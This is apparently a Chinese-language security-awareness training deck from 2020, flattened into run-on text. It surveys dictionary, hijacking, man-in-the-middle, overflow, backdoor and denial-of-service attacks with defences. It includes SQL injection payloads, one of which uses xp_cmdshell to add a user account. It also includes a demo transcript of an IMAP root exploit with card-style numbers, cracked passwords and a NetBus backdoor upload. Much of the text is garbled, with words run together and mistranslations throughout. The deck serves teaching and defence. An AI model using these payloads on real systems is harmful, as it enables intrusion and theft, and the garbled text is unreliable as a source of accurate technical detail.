安全基础知识培训最新版本

。基本安全知识培训，益阳安全黄建东，2020年6月，一些常见的概念和名词，木桶原理三部分技术，七部分管理，主要内容，入侵检测WINDOWS系统入侵检测UNIX系统入侵检测网络和数据库常见攻击和检测常见网络安全事件攻击原理和检测病毒，蠕虫原理分析和预防木马，流氓软件分析和预防，1.1入侵模式分析、字典攻击和防范劫持攻击和防范中间人攻击和防范病毒攻击和防范非法服务和防范溢出攻击和防范网络欺骗和防范拒绝服务攻击和防范，字典攻击：黑客使用一些自动执行的程序来猜测用户的生活和密码。中间人攻击：黑客从合法传输中嗅探密码和信息。劫持攻击：第三方(黑客)在对话中入侵双方。黑客攻击其中的一个，并伪装成病毒攻击：病毒是可以自我复制和传播的小程序，消耗系统资源。非法服务：非法服务是任何未经许可在您的操作系统上运行的进程或服务。溢出攻击：在易受攻击的程序上执行缓冲区溢出以获得主机操作权限。网络钓鱼：网络钓鱼攻击使用伪造的电子邮件和假冒的网址来欺骗用户。拒绝服务攻击：使用各种程序(包括病毒和数据包生成器)使系统崩溃或消耗带宽。1.1典型的入侵方法，路由器/交换机数据库网络和FTP服务器的协议相关服务，如DNS、WINS和SMB系统漏洞等最常受到攻击的目标。Unix防火墙，电子邮件服务器，网络服务器，路由器，NT，客户端删除来自用户的用户0；猜测表名：id=49 and(select count(*)from admin)=0猜测字段：id=49 and(select count(username)from admin)=0猜测字段长度：id=49 and(select top 1 len(username)from admin)无用户名值：id=49 and(select top 1 ASC(mid(username，1，1) fromadmin) 0(半查找分析)存储过程漏洞：http:/Site/url.asp？id=1；execmaster.XP _ cmdshell netusernamepassword/add -http:/site/URL . ASP？id=1；Backupdatabase数据库名称to disk= c : inet pub wwwroot 1 . db ；-，防注入，FW软件技术用户权限表名称和数据库文件数据库密码，5、常见网络安全事件攻击原理防范、缓冲区溢出字典攻击劫持攻击中间人攻击非法服务溢出攻击网络欺骗拒绝服务网络窃听网络异常流量僵尸网络。缓冲区溢出攻击原理，正常命令调用：COMMAND-r1ref-R2REFR2REF，参数堆栈区域，ref2ref1、调用返回点、imapd空间、用户命令、缓冲区溢出攻击原理、异常命令调用：命令参数过长、参数堆栈区、调用返回点、imapd空间、用户命令、覆盖返回点、缓冲区溢出攻击原理、成功攻击的两个条件、imapd本身存在缺陷、边界检查存在漏洞等。这允许攻击者测量溢出状态。Imapd是以超级用户权限启动的守护进程。嘿。hacker$，/imap_，IMAPExploitforLinux。author : Akylonius(aky galeb . ETF . BG . AC . Yu)Modifications : P1(P1 El 8 . org)，Completedsuccessfully .hacker$，尝试8.c .RedhatLinuxRelease 4.2(Biltmore)Kernel 2 . 0 . 35 Nani 686，root，bigwidgest : #，whoami，root，bigwidgest : #，cat。/hosts，127 . 0 . 0 . 1 localhostlocalhost . localdomain 208 . 21 . 2 . 10 thevoultaccount 208 . 21 . 2 . 11 fastlaksales 208 . 21 . 2 . 12 geekspeakengineering208 . 21 . 2 . 13 peoplehumanresour ce 208 . 21 . 2 . 14 thelink smarket 208 . 21 . 2 . 15 thesourceinformationsystems，bigwidge 3360 。AllanB。Smith 6543-2223-1209-400212/99 Donnad。史密斯6543-4133-0632-457206/98吉米史密斯6543-2344-1523-552201/01约瑟夫。Smith 6543-2356-1882-753204/02 KayL。史密斯6543-2398-1972-453206/03玛丽史密斯6543-8933-1332-422205/01。Smith6543-0133-5232-333205/99，the ault : #，catvisa.txt，cd/data/creditcards，the ault : #，the ault : #，crack/etc/passwd，Cracking/etc/passwd.username : bobpassword : ding，username : marry password : marry，username : rootpassword : NCC 1701，thevault:#，ftpthesource，connectedtothesource 220 thesourcemicrosoftpservice(4.0版)。名称：管理员，331 Passwordrequiredforadministrator。密码：*，230 UserAdministratorLoggedin。RemoteSystemTypeIswindows _ NT。浏览文件，搜索用户信息，使用字典攻击获取根密码，尝试使用相同密码的其他主机，成功完成R系列远程登录，安装后门。ftp，cdtemp，250CDWcommandsuccessful。ftp，sendnetbus.exe，local : netbus . exe remote e : netbus . exe，200PORTcommandsuccessful。150 openingbinarimodedataconnectionfornetbus . exe，226Transfercomplete。ftp，ftp，quit，thevault: $，telnetthesource，try 208 . 21 . 2 . 160，Escapecharacteris.Microsoft(R)WindowSnT(TM)4.00版(Build1381)，welcometomStelnetServiceTelNetServerBuild 5 . 00 . 98217 . 1 login :管理员，密码：* * * * * * * * * *=*=c 3360 ，CD temp，c: temp，netbus.exe，为了建立一个更复杂的密码机制，入侵检测系统被用来警告攻击。这种攻击通过做全面的日志记录来审计。字典攻击和预防。穷举法破解密码的简化方法。攻击过程：进入认证输入模式，打开暴力猜测工具，导入教师准备的字典库，反复进行匹配检查。劫机袭击与防范。攻击过程：使用工具(AladdinUDP)攻击一台机器，使用崩溃的IP地址向目标机器发送ICMP，以更新ARP缓存，从而与目标机器通信。防止会话劫持的预防方法是一个相对较大的项目。首先，应该使用交换网络而不是共享网络。虽然Hunt等工具可以在交换环境中实现会话劫持，但应该使用交换网络而不是共享网络，因为这样可以防止最基本的嗅探攻击。最基本的解决方案是使用加密通信，用SSH代替Telnet，用SSL代替HTTP，或者用IPSec/VPN，这样会话劫持就没有用了。其次，监控网络流量。如果在网络中发现大量的确认数据包，就有可能实施了会话劫持攻击。为防止ARP欺骗、中间人攻击和防范攻击过程：攻击者使用一个工具(FRAGROUTE)打开自己的ip转发功能，并使用PING命令分别获取攻击目标和网关的MAC地址。攻击者使用arpredirect工具重新路由目标主机和局域网内其他主机之间的联系。攻击者成为攻击目标，网关之间的路由器使用SNIFFER监控两台主机之间的会话内容，从而窃取信息。主机A、主机B、攻击者、内容、预防措施、不要将网络安全信任关系建立在ip或mac上(rarp也有欺诈问题)，理想的关系应该建立在ip mac上。设置一个静态的mac - ip映射表，不要让主机刷新您设置的转换表。除非必要，停止使用ARP，并将ARP作为永久条目保存在相应的表中。使用ARP服务器。服务器搜索自己的ARP转换表，以响应来自其他机器的ARP广播。确保这个ARP服务器没有被黑客攻击。使用硬件保护主机。设置路由以确保ip地址可以到达合法路径。(静态配置路由ARP条目)请注意，使用交换集线器和网桥无法防止ARP欺骗。管理员定期轮询以检查主机上的ARP缓存。非法服务原理及防范、攻击过程：攻击者通过某种方式在攻击者的系统中安装木马程序或后门程序，通过控制程序与攻击者的系统进行通信，获取信息或帐户密码。攻击者系统落入傀儡之手。审计TrapDoor和RootKitRootkit的预防方法是用特洛伊木马取代合法程序。TrapDoor是系统中的一个缺陷，在执行合法程序时会产生意想不到的结果。例如，旧版本的UNIXsendmail允许用户在执行调试命令时使用根权限执行脚本代码。接受严格权限控制的用户可以轻松添加用户帐户。虽然rootkit通常出现在UNIX系统中，但攻击者也可以通过看似合法的程序将后门插入WindowsNT。后门程序，如NetBus、BackOrifice和MastersofParadise可以让攻击者渗透和控制系统。特洛伊木马可由这些程序生成。如果攻击者足够狡猾，他可以使这些特洛伊木马程序避开一些病毒检测程序。当然，它们仍然可以通过最新升级的病毒检测程序找到。审计系统时，您可以检查、分析和扫描打开的端口，以检测rootkit和其他问题的存在。溢出攻击与防范，攻击过程：使用工具(NC)打开监听端口，使用溢出工具对系统漏洞(如MS05039)进行溢出攻击。攻击目标溢出后，反向连接到开放的监听端口。攻击者通过NETUSER/ADD和NETLOCALGROUP命令添加用户并增强权限，溢出，使用NC开放端口侦听，反向连接，攻击目标，攻击者，预防方法，及时安装bug程序和相应的补丁包，对希望受到保护的主机实施“单独开放端口”的访问控制策略，利用应用层防火墙系统在应用层处理数据，利用具有入侵检测功能的防火墙系统达到监控应用层数据的效果，网络欺骗与防范，攻击过程：发送具有欺骗性质的电子邮件或网络链接，使攻击者进入非法或危险的界面，感染病毒、木马或泄露用户的重要信息。攻击者完全被攻击者控制。预防方法：提高安全意识，不要随便浏览陌生邮件或陌生网站。拒绝服务攻击与防范。攻击过程：首先，攻击者使用工具(Ftn2k、Trinoo)向服务器发送大量带有虚假地址或格式错误的数据包的请求，并在服务器发送回复信息后等待返回信息。由于地址是伪造的，服务器不能等待返回信息，并且分配给该请求的资源尚未释放。当服务器等待一段时间后，连接将由于超时而被切断，攻击者将再次发送新一批请求。在重复发送错误地址请求的情况下，服务器资源最终会耗尽。因此，预防方法将关闭不必要的服务。将数据包的连接数从默认值128或512更改为2048或更多，以延长每个处理数据包的队列长度，从而简化和消化更多数据包的连接；将连接超时设置为较短，以确保正常的数据包连接并屏蔽非法攻击数据包；及时更新系统并安装补丁。防火墙设置：禁止访问主机非开放服务；限制同时打开的数据包的最大连接数；限制对特定IP地址的访问；启用防火墙的DDoS防护属性；严格限制对外开放的服务器，以防止其服务器被用作攻击他人的工具。路由器设置：访问控制列表过滤；设置数据包流量；为路由器设置日志服务器。病毒和蠕虫的分析和预防原理、病毒攻击、病毒攻击和预防、攻击过程：通过各种方式进入计算机系统(介质、系统漏洞)将其自身复制到计算机系统，并开始破坏系统的操作，甚至准备对其他系统进行病毒攻击，通过介质或网络将攻击范围传播到其他计算机系统，逐步传播攻击范围、预防方法，安装杀毒软件，定期升级最新的病毒数